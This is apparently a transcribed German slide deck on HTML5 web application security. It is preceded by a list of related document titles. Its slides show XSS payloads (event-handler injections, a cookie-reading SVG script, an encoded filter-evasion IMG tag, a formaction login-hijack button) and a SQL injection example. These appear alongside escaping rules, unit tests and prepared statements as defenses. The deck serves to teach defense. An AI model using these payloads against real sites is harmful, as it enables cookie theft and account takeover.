Created by Johannes Hoppe. Security



Similar documents
Website Login Integration

A Tale of the Weaknesses of Current Client-side XSS Filtering

Intell-a-Keeper Reporting System Technical Programming Guide. Tracking your Bookings without going Nuts!

Cross Site Scripting (XSS) and PHP Security. Anthony Ferrara NYPHP and OWASP Security Series June 30, 2011

Advanced XSS. Nicolas Golubovic

What about MongoDB? can req.body.input 0; var date = new Date(); do {curdate = new Date();} while(curdate-date<10000)

In order for the form to process and send correctly the follow objects must be in the form tag.

Investigation Report Regarding Security Issues of Web Applications Using HTML5

Finding XSS in Real World

c. Write a JavaScript statement to print out as an alert box the value of the third Radio button (whether or not selected) in the second form.

InternetVista Web scenario documentation

Web App Security Keeping your application safe Joe Walker

Acunetix Website Audit. 5 November, Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build )

<?php if (Login::isLogged(Login::$_login_front)) { Helper::redirect(Login::$_dashboard_front); }

HTML5 Top 10 Threats - Stealth Attacks and Silent Exploits

Advanced Web Technology 10) XSS, CSRF and SQL Injection 2

A Tale of the Weaknesses of Current Client-Side XSS Filtering

CTF Web Security Training. Engin Kirda

JavaScript Basics & HTML DOM. Sang Shin Java Technology Architect Sun Microsystems, Inc. sang.shin@sun.com

Lab 5 Introduction to Java Scripts

HTML5. Eoin Keary CTO BCC Risk Advisory.

XSS Lightsabre techniques. using Hackvertor

JavaScript Security. John Graham Cumming

Project 2: Web Security Pitfalls

XSS PROTECTION CHEATSHEET FOR DEVELOPERS V1.0. Author of OWASP Xenotix XSS Exploit Framework opensecurity.in

Client-side Web Engineering From HTML to AJAX

WEB APPLICATION SECURITY USING JSFLOW

Security starts in the head(er)

Web Accessibility Checker atutor.ca/achecker. Thursday June 18, :08:58

Abusing HTML5. DEF CON 19 Ming Chow Lecturer, Department of Computer Science TuCs University Medford, MA

Web Development 1 A4 Project Description Web Architecture

JavaScript and Dreamweaver Examples

Script Handbook for Interactive Scientific Website Building

Guide to Integrate ADSelfService Plus with Outlook Web App

Web Application Security Considerations

UI Redressing and Clickjacking. About click fraud and data theft

Using Form Tools (admin)

Web Application Exploits

JAVASCRIPT AND COOKIES

Sichere Webanwendungen mit Java

Hacking HTML5. No VirtualBox? VirtualBox (~4 gb needed) Apache + PHP Chrome + Firefox. unpack zeronights.zip

Intrusion detection for web applications

2- Forms and JavaScript Course: Developing web- based applica<ons

Login with Amazon. Getting Started Guide for Websites. Version 1.0

EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke

Visualizing an OrientDB Graph Database with KeyLines

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

Yandex.Widgets Quick start

Chapter 22 How to send and access other web sites

Defending against XSS,CSRF, and Clickjacking David Bishop

Table of Contents. Page ii

Web Application Security

Security Model for the Client-Side Web Application Environments

Attacks on Clients: Dynamic Content & XSS

UNTAMED XSS WARS FILTERS VS PAYLOADS

Bypassing XSS Auditor: Taking Advantage of Badly Written PHP Code

Visualizing a Neo4j Graph Database with KeyLines

Universal XSS via IE8s XSS Filters

<script type="text/javascript"> var _gaq = _gaq []; _gaq.push(['_setaccount', 'UA ']); _gaq.push(['_trackpageview']);

Article Widgets for publishers

Secure Coding. External App Integrations. Tim Bach Product Security Engineer salesforce.com. Astha Singhal Product Security Engineer salesforce.

Fortigate SSL VPN 4 With PINsafe Installation Notes

Network Security Web Security

Sabine Reich SAP. Test Workbench - Introduction

Towards More Security in Data Exchange

Web Application Guidelines

How To Fix A Web Application Security Vulnerability

Relax Everybody: HTML5 Is Securer Than You Think

Dynamic Web-Enabled Data Collection

Attacking with HTML5. By,

JavaScript: Arrays Pearson Education, Inc. All rights reserved.

Understanding Cross Site Scripting

Application Security Testing. Erez Metula (CISSP), Founder Application Security Expert

InPost UK Limited GeoWidget Integration Guide Version 1.1

Exploits: XSS, SQLI, Buffer Overflow

SQL injection attacks SQL injection user input SQL injection SQL Command parameters Database account. SQL injection attacks Data Code

NO SQL! NO INJECTION?

Protection, Usability and Improvements in Reflected XSS Filters

Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense

MASTERTAG DEVELOPER GUIDE

Tutorial: Building a Dojo Application using IBM Rational Application Developer Loan Payment Calculator

PHP Tutorial From beginner to master

Uploaded images filter evasion for carrying out XSS attacks

Implementing Specialized Data Capture Applications with InVision Development Tools (Part 2)

WEB DESIGN LAB PART- A HTML LABORATORY MANUAL FOR 3 RD SEM IS AND CS ( )

HTML Web Page That Shows Its Own Source Code

Analysis of Browser Defenses against XSS Attack Vectors

" # Portal Integration SAP AG 2004, 3

Transcription:

Created by Johannes Hoppe Security

Ziel Angriffsvektoren aufzeigen. Strategien besprechen. Mehr nicht!

Features Neue Angriffsvektoren

Ein Formular Username: Password: Login <form id="login" action="#"> Username: <input type="text" name="username"> Password: <input type="password" name="password"> <input type="submit" value="login"> </form>

Formaction Username: Password: Login Klick mich! <form id="login" action="#"> Username: <input type="text" name="username"> Password: <input type="password" name="password"> <input type="submit" value="login"> </form> <button type="submit" form="login" formaction="http://example.org"> Klick mich! </button>

SVG Presto, WebKit, Gecko und sogar Trident 9 <?xml version="1.0"?> <svg xmlns="http://www.w3.org/2000/svg" width="40" height="40"> <circle cx="20" cy="20" r="15" fill="yellow" stroke="black"/> <circle cx="15" cy="15" r="2" fill="black" stroke="black"/> <circle cx="25" cy="15" r="2" fill="black" stroke="black"/> <path d="m 13 26 A 5 3 0 0 0 27 26" stroke="black" fill="none" stroke -width="2"/> </svg>

SVG kann JavaScript enthalten! Test <?xml version="1.0"?> <svg xmlns="http://www.w3.org/2000/svg" width="200" height="50"> <defs><style> <![CDATA[ text { font-size:6pt; } ]]> </style></defs> <circle cx="20" cy="20" r="15" fill="yellow" stroke="black"/> <circle cx="15" cy="15" r="2" fill="black" stroke="black"/> <circle cx="25" cy="15" r="2" fill="black" stroke="black"/> <path d="m 13 26 A 5 3 0 0 0 27 26" stroke="black" fill="none" stroke -width="2" transform="rotate(180, 20, 28)"/> <text x="11" y="50" id="display">test</text> <script> alert(document.cookie); document.getelementbyid('display').textcontent = document.cookie; </script> </svg>

Business as usual HTML5 es ist auch nicht schlimmer als HTML 4» http://html5sec.org

XSS Eingeschleuster JavaScript-Code

Oldies but Goldies index.html?message=daten gespeichert index.html?message=<script>alert('xss')</script> <script> var message = $.url().param('message'); if (message) { Notifier.success(message); } </script>

Eval everywhere Eval is evil <!-- Self-executing onfocus event via autofocus --> <input onfocus="alert('xss onfocus')" autofocus> <!-- Video OnError --> <video><source onerror="javascript:alert('xss onerror')"></video> <!-- Presto only: Form surveillance --> <form id=test onforminput=alert('xss onforminput')> <input> </form> <button form=test onformchange=alert('xss onformchange')>x</button>» Demo 1 2 3

OWASP Open Web Application Security Project XSS Filter Evasion Cheat Sheet <!-- Long UTF-8 Unicode encoding without semicolons --> <IMG SRC="&#34&#32&#111&#110&#101&#114&#114&#111&#114&#61&#34&#97&#108& #101&#114&#116&#40&#39&#88&#83&#83&#39&#41&#59">» Old IE Demo

XSS Vorbeugen

<script> HIER </script> <!-- HIER --> <div HIER="test"/> <HIER href="test" /> <style> HIER </style> 1. Hier sollten dynamische Daten niemals verwendet werden

2. HTML escape dynamic data <div>html ESCAPE</div> & & < < > > " " ' &apos; / &#39;

Testen? function htmlencode(input) { // jquery.text == document.createtextnode return ($('<div/>').text(input).html()); } var saveformat = function () { var args = Array.prototype.slice.call(arguments); var txt = args.shift(); }; $.each(args, function (i, item) { item = htmlencode(item); txt = txt.replace("{" + i + "}", item); }); return txt;

Testen! describe("saveformat", function () { var original = '{0} - {1} - {2}'; it("should replace placeholders", function () { var expected = 'A - B - C'; var formated = saveformat(original, 'A', 'B', 'C'); expect(formated).toequal(expected); }); it("should encode injected content", function () { var expected = 'A - <b>test</b> - C'; var formated = saveformat(original, 'A', '<b>test</b>', 'C'); expect(formated).toequal(expected); }); });

Test Jasmine 1.3.1 revision 1354556913 Passing 2 specs finished in 0.007s No try/catch saveformat should replace placeholders should encode injected content» Demo

Moment... describe("saveformat", function () { var original = '<a title="{0}">test</a>'; it("should replace quotes", function () { var expected = '<a title=""">test</a>'; var formated = saveformat(original, '"'); expect(formated).toequal(expected); }); });

Richtig testen! Jasmine 1.3.1 revision 1354556913 x Failing 1 spec 1 spec 1 failing finished in 0.006s No try/catch saveformat should replace quotes. Expected '<a title=""">test</a>' to equal '<a title=""">test</a>'. Error: Expected '<a title=""">test</a>' to equal '<a title=""">test</a>'. at new jasmine.expectationresult (http://localhost:1332/examples/jasmine/lib/j at null.toequal (http://localhost:1332/examples/jasmine/lib/jasmine-1.3.1/jasm at null.<anonymous> (http://localhost:1332/examples/jasmine-demo2/saveformat.s at jasmine.block.execute (http://localhost:1332/examples/jasmine/lib/jasmine-1 at jasmine.queue.next_ (http://localhost:1332/examples/jasmine/lib/jasmine-1.3» Demo

3. Attribute escape dynamic data <div attr="attribute ESCAPE"></div> <!-- NIEMALS ohne quotes! --> <div attr=attribute ESCAPE></div> a-z A-Z 0-9 immun,. - _ immun Rest &#xhh;

4. DO NOT JavaScript escape dynamic data HTML parser runs before the JavaScript parser! you are doing it wrong

Das hier ist Alltag UserList.cshtml / Kendo UI Template # if(id!= 0) { # <a href="javascript:dialogmanager.showpartialdialog('@url.action("userm anagement", "Management")', { userid : '#= htmlencode(id) #' }, {title: '#= htmlencode(alias) #'})"#= htmlencode(alias) #</a> # } else { # #= htmlencode(alias) # # } #

? Offensichtlich läuft beim Umgang mit Daten etwas prinzipiell falsch!

Storage

Egal ob Cookies ob Session Storage ob Local Storage ob WebSQL die Daten sind nicht vertrauenswürdig!

Resident XSS richtig fies!

Vertraulichen Informationen gehören in die SERVER-Session!

Session Storage bevorzugen!

WebSQL SQL Injection: executesql("select foo FROM bar WHERE value=" + value); Prepared Statement: executesql("select foo FROM bar WHERE value=?", [value]);

Kommunikation

Mashups! define(['jquery', 'knockout', 'knockout.mapping', 'domready!'], function ($, ko, mapping) { var url ='http://search.twitter.com/search.json?q=%23xss&callback=?'; $.getjson(url).done(function (data) { var viewmodel = mapping.fromjs(data); ko.applybindings(viewmodel, $('#tweets').get(0)); }); });

Loading...

JSON {"hello": "world"} JSON with Padding <script> var foo = function(json) { $('#output').text(json.stringify(json, undefined, 2)); }; </script> <script src="http://search.twitter.com/search.json?q=%23dnc13&callback= foo"></script> foo({"hello": "world"});» Demo

JSONP

SOP Same origin policy Not macht erfinderisch (JSONP) CORS Cross-Origin Resource Sharing Access-Control-Allow-Origin: * WebSockets do what you want

JS-Recon Shell of the Future

Intranet == Internet

Danke!

» Sicherheit von Web-Anwendungen

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information